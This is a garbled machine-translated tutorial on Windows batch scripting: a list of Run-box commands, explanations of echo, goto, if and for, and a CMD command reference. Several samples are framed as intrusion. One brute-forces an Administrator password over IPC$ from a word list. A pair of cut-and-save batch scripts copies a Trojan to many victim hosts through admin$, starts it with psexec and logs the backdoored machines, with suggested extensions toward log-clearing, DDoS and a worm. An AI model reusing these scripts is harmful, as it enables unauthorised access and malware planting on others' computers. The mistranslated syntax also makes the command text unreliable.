Win Batch Processing

Winver---------Check Windows version wmimgmt.msc----open Windows Management architecture wupdmgr--------Windows Update winver---------Check the Windows version Wmimgmt.msc----open Windows Management architecture wupdmgr--------Windows Update WScript--------Windows Script Host Settings Write----------WordPad winmsd-----System Information wiaacmgr-------Scanner and Camera Wizard winchat--------xp own LAN chat Mem.exe--------Show memory usage Msconfig.exe---System Configuration Utility mplayer2-------Easy widnows Media Player mspaint--------drawing board mstsc----------Remote Desktop Connection Mplayer2-------Media Player magnify--------Magnifier utility MMC------------Open the console mobsync--------Sync command dxdiag---------check DirectX information DRWTSN32------System Doctor devmgmt.msc---Device Manager dfrg.msc-------Disk Defragmenter diskmgmt.msc---Disk Management utility DCOMCNFG-------Open System Component Services DdeShare-------turn on DDE sharing settings Dvdplay--------DVD player net stop Messenger-----Stop messenger Service net start Messenger----Start Messenger Service Notepad--------Open Notepad nslookup-------Network Management tool Wizard Ntbackup-------system backup and restore narrator-------screen narrator ntmsmgr.msc----Mobile Storage Manager Ntmsoprq.msc---The Mobile Storage Administrator action Request Netstat-an----(TC) command to check the interface Syncapp--------Create a Briefcase sysedit--------System Configuration Editor Sigverif-------File Signature Validator sndrec32-------Recorder SHRPUBW--------Create a shared folder secpol.msc-----Local Security Policy SYSKEY---------system encryption, and once encryption cannot be undone, protect the dual password of Windows XP system Services.msc---Local Service settings Sndvol32-------Volume Control program sfc.exe--------System File Checker sfc/scannow---Windows File Protection TSSHUTDN-------60-second Countdown shutdown command tourstart------XP profile (roaming XP programs that appear after installation is complete) Taskmgr--------Task Manager eventvwr-------Event Viewer Eudcedit-------Font-character Program Explorer-------Open Explorer Packager-------Object Packager perfmon.msc----computer performance monitoring Program ProgMan--------Program Manager Regedit.exe----Registry Rsop.msc-------Group Policy result set regedt32-------Registry Editor rononce-p----15 seconds shutdown regsvr32/u *.dll----Stop DLL files from running regsvr32/u zipfldr.dll------Cancel zip support cmd.exe--------cmd command prompt chkdsk.exe-----chkdsk disk Check certmgr.msc----Certificate Management Utility Calc-----------Start Calculator charmap--------start character mapping table cliconfg-------SQL SERVER Client Network Utility CLIPBRD--------Clipboard Viewer Conf-----------start NetMeeting compmgmt.msc---Computer Management cleanmgr-------* * Organize ciadv.msc------Indexing Service Osk------------Open on-Screen keyboard ODBCAD32-------ODBC Data Source Administrator oobe/msoobe/a----Check if XP activates lusrmgr.msc----native users and Groups logoff---------logoff command IExpress-------Trojan Bundle tool, System comes with Nslookup-------IP address detector fsmgmt.msc-----shared Folder Manager Utilman--------Utility Manager gpedit.msc-----Group Policy

----------------------------------------------------------------------------- ---------------------------------- -------------------------------------------1.Echo Command

Turn on echo or turn off the request Echo feature, or display a message. If there are no parameters, the echo command displays the current echo setting.

Grammar

echo [{On|off}] [message]

Sample:echo Off/echo Hello World

In practical applications we will combine this command with a redirect symbol (also known as a pipe symbol, commonly used with > >> ^) to enter some commands into a file of a particular format. This will be reflected in a later example.

[Email protected] command

Indicates that the command after the @ is not displayed, and in the intrusion process (for example, using batches to format the enemy's hard disk), it is not natural to let the other party see the command you are using.

Sample: @echo off

@echo now initializing the program,please wait a minite ...

@format X:/q/u/autoset (Format This command is not allowed to use/y This parameter, it is gratifying that Microsoft left a autoset This parameter to us, the effect and/y is the same. )

3.Goto command

Specifies to jump to the label, and when the label is found, the program processes the command starting from the next line.

Syntax: Goto label (label is a parameter that specifies the line in the batch program to which you want to turn.) )

Sample:

if {%1}=={} goto noparms

if {%2}=={} goto noparms (if,% 1,%2 if you do not understand it, skip it first and there will be a detailed explanation later.) )

@Rem check parameters if NULL show usage

: noparms

echo Usage:monitor.bat ServerIP portnumber

Goto END

The name of the tag can be random, but it is better to have a meaningful letter, the letter is added: to indicate that the letter is a label, the Goto command is based on this: to find the next jump to go there. It's better to have some instructions so that you can look at your intentions.

4.Rem command

Note Command, in C language equivalent to/*--------* *, it will not be executed, just a comment on the role, easy for others to read and your own later modification.

Rem Message

Sample: @Rem Here is the description.

5.Pause command

When you run the Pause command, the following message is displayed:

Press any key to continue ...

Sample:

@echo off

: Begin

Copy a:*.* D:\back

Echo, put a new disk into driver a

Pause

Goto BEGIN

In this example, all the files on the disk in drive A are copied to D:\back. The comment that appears prompts you to put another disk in drive A, and the pause command suspends the program so that you can replace the disk and press any key to continue processing.

6.Call command

Another batch program is called from one batch program, and the parent batch program is not terminated. The call command accepts the label that is used as the calling target. If you use call outside of a script or batch file, it will not work at the command line.

Grammar

call [[Drive:][path] FileName [batchparameters]] [: Label [arguments]]

Parameters

[Drive:} [Path] FileName

Specifies the location and name of the batch program to invoke. The filename parameter must have a. bat or. cmd extension.

7.start command

Calling an external program, all DOS commands and command-line programs can be called by the start command.

Common parameters of intrusion:

Min Start window minimized

Separate start 16-bit Windows programs in separate spaces

High starts the application in the high priority category

REALTIME starting the application in the REALTIME priority category

Wait to start the application and wait for it to end

Parameters these parameters for transmission to the command/program

The application that executes is a 32-bit GUI application when CMD. EXE returns a command prompt without waiting for the application to terminate. If executed within a command script, the new behavior does not occur.

8.choice command

Choice Use this command to let the user enter a character to run different commands. Use should be Plus/C: parameters, C: After the prompt should be written to enter the characters, no spaces between. It has a return code of 1234 ...

such as: Choice/c:dme defrag,mem,end

will display

Defrag,mem,end[d,m,e]?

Sample:

The contents of Sample.bat are as follows:

@echo off

Choice/c:dme Defrag,mem,end

if errorlevel 3 goto defrag (the highest number of error codes should be judged first)

if errorlevel 2 goto MEM

If Errotlevel 1 goto end

:d Efrag

C:\dos\defrag

Goto END

: Mem

Mem

Goto END

: End

echo Good bye

When this file runs, Defrag,mem,end[d,m,e] is displayed? The user can select D m e, then the IF statement will be judged, D represents the execution of a program segment labeled Defrag, M represents the execution of a program segment labeled Mem, E represents the execution of a program segment labeled End, and each segment ends with a goto end to jump the program to the end label. Then the program will show good Bye, the end of the file.

9.If command

The IF indicates that the specified conditions will be judged, thus deciding to execute different commands. There are three types of formats:

1, if "parameter" = = "string" command to be executed

If the argument equals the specified string, the condition is set, run the command, or run the next sentence. (note is two equals)

If "%1" = = "A" format a:

if {%1}=={} goto noparms

if {%2}=={} goto noparms

2. If exist filename to execute command

If there is a specified file, then the condition is established, run the command, otherwise run the next sentence.

such as if exist Config.sys edit Config.sys

3. If errorlevel/if not errorlevel number of commands to be executed

If the return code equals the specified number, the condition is set up, run the command, or run the next sentence.

if errorlevel 2 goto x2

DOS programs will return a number to DOS, called the error code ERRORLEVEL or return code, the common return code is 0, 1.

10.for command

The for command is a more complex command that is used primarily for parameters that loop through commands within a specified range.

When using the for command in a batch file, specify the variable using the%%variable

for {%variable|%%variable} in (set) do command [CommandLineOptions]

%variable specifies a single-letter replaceable parameter.

(set) specifies one or a set of files. Wildcard characters can be used.

command specifies the commands to execute on each file.

Command-parameters specify parameters or command-line switches for specific commands.

When using the for command in a batch file, specify the variable using the%%variable

And don't use%variable. Variable names are case-sensitive, so%i differs from%i

If the command extension is enabled, the following additional for command formats are

Support:

FOR/D%variable in (set) do command [Command-parameters]

If a wildcard is included in the set, the specified match to the directory name and not to the file

Name matches.

FOR/R [[Drive:]path]%variable in (set) do command [command-

Check the directory tree with [Drive:]path Root], pointing to each directory

For statement. If no directory is specified after/R, use the current

Directory. If the set is only a single point (.) character, the directory tree is enumerated.

FOR/L%variable in (start,step,end) do command [Command-para

The set represents a sequence of numbers in increments from start to finish.

Therefore, (1,1,5) will produce sequence 1 2 3 4 5, (5,-1,1) will produce

Sequence (5 4 3 2 1).

for/f ["Options"]%variable in (file-set) do command

for/f ["Options"]%variable in ("string") do command

for/f ["Options"]%variable in (command) do command

Or, if you have the USEBACKQ option:

for/f ["Options"]%variable in (file-set) do command

for/f ["Options"]%variable in ("string") do command

for/f ["Options"]%variable in (command) do command

FileNameSet is one or more file names. Continue to the filenameset.

Before the next file, each file has been opened, read, and processed.

Processing involves reading a file, dividing it into lines of text, and then each line

Parse to 0 or more symbols. Then use the found symbol string variable value

Call the For loop. By default,/F is separated by each line in each file

The first blank symbol. Skips a blank line. You can specify an optional "options" by specifying

Parameter overrides the default resolution operation. This quoted string consists of one or more

Specifies the keywords for the different parsing options. These keywords are:

Eol=c-refers to the end of a line comment character (just one)

Skip=n-refers to the number of rows that are ignored at the beginning of the file.

Delims=xxx-refers to the delimiter set. This replaces the space and the jump bar

The default delimiter set.

Tokens=x,y,m-n-Indicates which symbol per line is passed to each iteration

For itself. This causes the extra variable name to be

The format is a range. Specify m with the nth symbol

The last character in the symbol string, the asterisk number,

Then the additional variables will be parsed at the last symbol

Assigns and accepts the retained text of a row.

USEBACKQ-Specifies that the new syntax is used in the following class situation:

A string that executes a post quote as a command and

The quotation mark character is a literal string command and allows the fi

Use double quotation marks to expand the file name.

Sample1:

For/f "eol=; tokens=2,3* delims=, "%i in (myfile.txt) do command

Each row in the myfile.txt is parsed, ignoring those lines that begin with a semicolon,

The second and third symbols in each row are passed to the for program body, with commas and/or

Space-bound symbol. Note that the statement for the body of the For program references%i to

Get the second symbol, reference%j to get a third symbol, reference%k

To get all the remaining symbols after the third symbol. For files with spaces

Name, you need to enclose the file name in double quotation marks. In order to use this method to make

With double quotes, you also need to use the USEBACKQ option, otherwise, double quotes will

is understood to be used to define a string to parse.

%i is specifically described in the For statement,%j and%k are provided by

The tokens= options are specifically described. You can tokens= a line by

Specify a maximum of 26 symbols, as long as you do not attempt to describe a higher than the letter Z or

Z's variable. Keep in mind that the for variable is single-letter, case-sensitive, and global;

At the same time not more than 52 are in use.

You can also use for/f parsing logic on adjacent strings, by

Enclose the filenameset between parentheses in single quotation marks. This way, the character

The string is treated as a single input line in a file.

Finally, you can use the for/f command to parse the output of the command. The method is to

The filenameset between parentheses becomes an anti-enclosing string. The string is

is treated as a command line, passed to a sub-CMD. EXE, its output will be caught in

Memory and is parsed as a file. Therefore, the following example:

for/f "Usebackq delims=="%i in (' Set ') do @echo%i

Enumerates the environment variable names in the current environment.

In addition, the substitution of the for variable reference has been enhanced. You can now use the following

Option syntax:

~i-Remove any quotation marks ("), expand%I

%~fi-Will%I Extend to a fully qualified path name

%~di-will only%I Extend to a drive letter

%~PI-will only%I Extend to a path

%~ni-will only%I Extend to a file name

%~xi-will only%I Expand to a file name extension

%~si-The expanded path contains only short names

%~ai-Will%I File attributes to expand to a file

%~ti-Will%I Date/time of extension to file

%~zi-Will%I Expand to File Size

%~ $PATH: I-Find the directory that is listed in the PATH environment variable and%I Expand

To the first fully qualified name found. If the environment variable

is not defined, or the file is not found, this key combination expands

Empty string

You can combine modifiers to get multiple results:

%~DPI-will only%I Expand to a drive letter and path

%~nxi-will only%I Expand to a file name and extension

%~FSI-will only%I Extend to a full pathname with a short name

%~DP$PATH:I-finds the directory that is listed in the PATH environment variable and will%I Expand

To the first drive letter and path found.

%~ftzai-Will%I Extended to DIR with similar output line

In the above example,%I And PATH can be replaced by other valid values. %~ syntax

Terminates with a valid for variable name. Choose similar%I The uppercase variable name

Easier to read and avoid confusion with key combinations that are not case-sensitive.

The above is the official help of MS, let us give a few examples to specify the purpose of the for command in the intrusion.

Sample2:

Use the for command to implement brute-force password cracking on a target Win2K host.

We used net use \\ip\ipc$ "password"/u: "Administrator" to try to connect to the target host and write down the password when it succeeds.

The main command is a: for/f i% in (dict.txt) does net use \\ip\ipc$ "i%"/U: "Administrator"

Use i% to represent the password of the admin, in Dict.txt this takes the value of i% with the net use command to connect. Then pass the program run result to the Find command--

for/f i%% in (dict.txt) does net use \\ip\ipc$ "i%%"/U: "Administrator" |find ": Command completed successfully" >>d:\ok.txt, so KO.

Sample3:

Have you ever had a large number of chickens waiting for you to plant a backdoor + Trojan? When the number is particularly high, one thing that would have been very happy would become very depressing:). The article begins with the use of batch files, which simplifies routine or repetitive tasks. So how to achieve it? Oh, look down you will understand.

The primary command also has only one: (When using the for command in a batch file, the specified variable uses%%variable)

@for/F "tokens=1,2,3 delims="%%i in (victim.txt) does start call Door.bat%%i%%j%%k

Tokens is used in the sample1 above, where it means to pass the contents of Victim.txt in order to the parameters in Door.bat%i%j.

And Cultivate.bat is nothing more than using net USE command to establish ipc$ connection, and copy Trojan + backdoor to victim, and then use the return code (If errorlever =) to filter the host successfully planted back door, and echo out, or echo to the specified file.

Delims= indicates that the content in the vivtim.txt is delimited by a space. I want to see here you must understand what the content of this victim.txt is. It should be arranged according to the objects represented by%%i%%j%%k, which is usually IP password username.

Code prototype:

---------------cut here and Save as a batchfile (I call it main.bat)--------------------

@echo off

@if "%1" = = "" Goto usage

@for/F "tokens=1,2,3 delims="%%i in (victim.txt) does start call Ipchack.bat%%i%%j%%k

@goto End

: Usage

@echo run this batch in DOS modle.or just double-click it.

: End

---------------cut here and Save as a batchfile (I call it main.bat)--------------------

-------------------cut here and Save as a batchfile (I call it door.bat)-----------------

@net use \\%1\ipc$%3/u: "%2"

@if errorlevel 1 goto failed

The @echo Trying to establish the ipc$ connection ..... Ok

@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP%1 USER%2 PWD%3 >>ko.txt

@p***ec \\%1 C:\winnt\system32\windrv32.exe

@p***ec \\%1 net start windrv32 && if not errorlevel 1 echo%1 backdoored >>ko.txt

: Failed

@echo Sorry can not connected to the victim.

-----------------cut here and Save as a batchfile (I call it door.bat)-------------------

This is just a prototype of the automatic Plantation backdoor batch, with two batches and backdoors (Windrv32.exe), PSexec.exe need to be placed in the Unified directory. Batch Content

Can be extended, for example: Add the ability to clear the log +ddos, add the function of the time adding users, a bit more in order to have automatic propagation function (worm). There is not much to do here, interested friends can study on their own.

For more information about a command, type the help command name

Xp. CMD command Daquan

For more information about a command, type the help command name

ASSOC Displays or modifies file name extension associations.

At Schedules commands and programs to run on the computer.

ATTRIB Display or change file properties.

Break sets or clears the extended CTRL + C check.

CACLS displays or modifies the file's access control List (ACLs).

Call calls this one from another batch program.

The CD displays the name of the current directory or changes it.

CHCP Displays or sets the number of active code pages.

CHDIR displays the name of the current directory or changes it.

CHKDSK checks the disk and displays the status report.

CHKNTFS Displays or modifies the startup time disk check.

CLS clears the screen.

CMD opens another Windows command interpreter window.

Color sets the default console foreground and background color.

COMP compares the contents of two or two sets of files.

Compact displays or changes the compression of files on NTFS partitions.

Convert converts a FAT volume to NTFS. You cannot convert

The current drive.

Copy copies at least one of the files to another location.

Date Displays or sets dates.

DEL deletes at least one file.

DIR displays the files and subdirectories in a directory.

DISKCOMP compares the contents of two floppy disks.

DISKCOPY Copy the contents of one floppy disk to another.

DOSKEY Edit the command line, invoke the Windows command, and create a macro.

echo Displays the message, or turns the command back on or off.

Endlocal to end localization of environment changes in batch files.

ERASE Delete at least one file.

Exit CMD. EXE Program (command interpreter).

FC compares two or two sets of files and displays

Different places.

Find searches the file for a text string.

FINDSTR searches for strings in the file.

For each file in a set of files, run a specified command.

Format formats the disk for use with Windows.

FTYPE displays or modifies the file types used for file name extension associations.

GOTO to point the Windows command interpreter to a batch program

One of the indicated rows in the

GRAFTABL enable Windows to display in image mode

Extended character Set.

Help provides information about Windows commands.

IF you perform conditional processing in a batch program.

Label creates, changes, or deletes a disk's volume label.

MD to create a directory.

MKDIR Create a directory.

MODE configures the system device.

More displays a result screen at a time.

Move moves files from one directory to another.

Path displays or sets the search path for the executable file.

Pause pauses processing of batch files and displays messages.

POPD restores the previous value of the current directory saved by PUSHD.

Print prints a text file.

PROMPT change the Windows command prompt.

PUSHD Save the current directory and make changes to it.

RD Delete directory.

RECOVER recovers readable information from the problematic disk.

REM record batch file or CONFIG. The comment in SYS.

REN renames the file.

RENAME Rename the file.

Replace replaces the file.

RMDIR Delete the directory.

Set to display, set, or remove Windows environment variables.

SETLOCAL the localization of the environment changes in the batch file.

SHIFT replaces the position of replaceable parameters in the batch file.

Sort to categorize the input.

Start starts another window to run the specified program or command.

SUBST associates the path with a drive letter.

Time displays or sets the system times.

The TITLE sets CMD. The window caption of the EXE session.

Tree displays the directory structure of a drive or path in graphical mode.

TYPE Displays the contents of the text file.

VER shows the version of Windows.

VERIFY tell Windows whether to verify that the file is correct

Write to disk.

VOL Displays the disk volume label and serial number.

XCOPY copies files and directory trees.

Appwiz.cpl------------Add a Remove program

Control userpasswords2--------User account Settings

cleanmgr-------Waste Finishing

The CMD--------------command prompt can be thought of as an attachment to Windows that ping,convert these features that cannot be used in a graphical environment.

CMD------jview View the Java Virtual Machine version.

Command.com------Call is the system built-in NTVDM, a DOS virtual machine. It is completely a virtual PC-like environment, and the system itself is not very connected. When we run a DOS program at the command prompt, it is actually automatically transferred to the NTVDM virtual machine, which has nothing to do with the CMD itself.

Calc-----------Start Calculator

Chkdsk.exe-----CHKDSK disk Check

Compmgmt.msc---Computer Management

Conf-----------start NetMeeting

Control USERPASSWORDS2-----User account permission settings

Devmgmt.msc---Device Manager

Diskmgmt.msc---Disk Management utility

Dfrg.msc-------Disk Defragmenter

DRWTSN32------System Doctor

Dvdplay--------Start Media Player

DxDiag-----------DirectX Diagnostic Tool

gpedit.msc-------Group Policy Editor

Gpupdate/target:computer/force Force Refresh Group Policy

Eventvwr.exe-----Event Viewer

Explorer-------Open Resource Manager

Logoff---------Logoff command

Lusrmgr.msc----native Users and Groups

Msinfo32---------System Information

Msconfig---------System Configuration Utility

net start (servicename)----start the service

net stop (servicename)-----Stop the Service

Notepad--------Open Notepad

Nusrmgr.cpl-------with Control userpasswords, open the user Account Control Panel

Nslookup-------IP Address detector

oobe/msoobe/a----Check if XP is active

PERFMON.MSC----Computer Performance monitoring Program

ProgMan--------Program Manager

Regedit----------Registry Editor

Regedt32-------Registry Editor

regsvr32/u *.dll----Stop DLL file to run

Route print------View the routing table

Rononce-p----15-second shutdown

Rsop.msc-------Group Policy result set

rundll32.exe rundll32.exe%systemroot%system32shimgvw.dll,imageview_fullscreen----Start a blank Windows Picture and Fax Viewer

Secpol.msc--------Local Security Policy

Services.msc---Local Service settings

Sfc/scannow-----Boot System File Checker

SNDREC32-------Recorder

Taskmgr-----Task Manager (for 2000/xp/2003)

TSSHUTDN-------60-second Countdown shutdown command

Winchat--------XP comes with LAN chat

WINMSD---------System Information

Winver-----Show about Windows wupdmgr-----------Windows Update